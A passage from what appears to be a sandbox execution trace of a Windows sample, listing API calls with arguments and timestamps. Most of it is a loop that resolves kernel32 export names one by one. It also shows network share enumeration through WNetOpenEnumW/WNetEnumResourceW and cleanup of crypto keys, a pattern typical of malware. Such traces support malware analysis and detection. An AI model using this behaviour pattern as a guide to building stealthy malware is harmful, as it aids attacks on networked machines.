lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0071.131] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0071.131] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0071.131] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0071.131] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0071.131] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0071.131] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0071.131] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0071.131] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0071.131] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0071.131] lstrcpyA (in: lpString1=0x410ec90, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0071.131] WNetCloseEnum (hEnum=0x61b7f0) returned 0x0 [0071.131] WNetEnumResourceW (in: hEnum=0x5f8b58, lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c | out: lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c) returned 0x0 [0071.132] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0xfa0000, lphEnum=0x410f920 | out: lphEnum=0x410f920*=0xffffffff) returned 0x4b8 [0083.539] WNetEnumResourceW (in: hEnum=0x5f8b58, lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c | out: lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c) returned 0x0 [0083.540] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0xfa0000, lphEnum=0x410f920 | out: lphEnum=0x410f920*=0xffffffff) returned 0x4c6 [0083.542] WNetEnumResourceW (in: hEnum=0x5f8b58, lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c | out: lpcCount=0x410f954, lpBuffer=0xfa0000, lpBufferSize=0x410f94c) returned 0x103 [0083.542] WNetCloseEnum (hEnum=0x5f8b58) returned 0x0 [0083.542] CryptDestroyKey (hKey=0x5f8b18) returned 1 [0083.542] CryptReleaseContext (hProv=0x61ebc8, dwFlags=0x0) returned 1 [0083.542] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.542] RtlExitUserThread (Status=0x0) Thread: id = 115 os_tid = 0xbf8 [0090.242] VirtualAlloc (lpAddress=0x0, dwSize=0x31, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0090.242] GetTickCount () returned 0x114efcc [0090.242] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0090.242] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0090.243] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0090.246] GetTickCount () returned 0x114efdb [0090.246] GetTickCount () returned 0x114efdb [0090.246] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0090.246] lstrlenA (lpString="kernel32.dll") returned 12 [0090.246] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0090.246] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0090.246] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0090.246] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0090.246] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0090.246] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0090.246] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0090.246] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0090.246] lstrlenA (lpString="ADDATOMA") returned 8 [0090.246] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0090.247] lstrlenA (lpString="ADDATOMW") returned 8 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0090.247] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0090.247] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0090.247] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0090.247] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0090.247] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0090.247] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0090.247] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0090.247] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0090.247] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0090.247] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0090.247] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0090.247] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0090.247] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0090.247] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0090.247] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0090.247] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0090.247] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0090.247] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0090.248] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0090.248] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0090.248] lstrlenA (lpString="BACKUPREAD") returned 10 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0090.248] lstrlenA (lpString="BACKUPSEEK") returned 10 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0090.248] lstrlenA (lpString="BACKUPWRITE") returned 11 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0090.248] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0090.248] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0090.248] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0090.248] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0090.248] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0090.248] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0090.248] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0090.248] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0090.248] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0090.248] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0090.248] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0090.248] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0090.248] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0090.248] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0090.249] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0090.249] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0090.249] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0090.249] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0090.249] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0090.249] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0090.249] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0090.249] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0090.249] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0090.249] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0090.249] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0090.249] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0090.249] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0090.249] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0090.249] lstrlenA (lpString="BEEP") returned 4 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0090.249] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0090.249] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0090.249] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0090.250] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0090.250] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0090.250] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0090.250] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0090.250] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0090.250] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0090.250] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0090.250] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0090.250] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0090.250] lstrlenA (lpString="CANCELIO") returned 8 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0090.250] lstrlenA (lpString="CANCELIOEX") returned 10 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0090.250] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0090.250] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0090.250] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0090.250] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0090.250] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0090.250] lstrlenA (lpString="CHECKELEVATION") returned 14 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0090.250] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0090.250] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0090.251] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0090.251] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0090.251] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0090.251] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0090.251] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0090.251] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0090.251] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0090.251] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0090.251] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0090.251] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0090.251] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0090.251] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0090.251] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0090.251] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0090.251] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0090.251] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0090.251] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0090.251] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0090.251] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0090.251] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0090.252] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0090.252] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0090.252] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0090.252] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0090.252] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0090.252] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0090.252] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0090.252] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0090.252] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0090.252] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0090.252] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0090.252] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0090.252] lstrcpyA (in: lpString1=0x3c2eae4, lpString2="ConvertFiberToThread" | out: 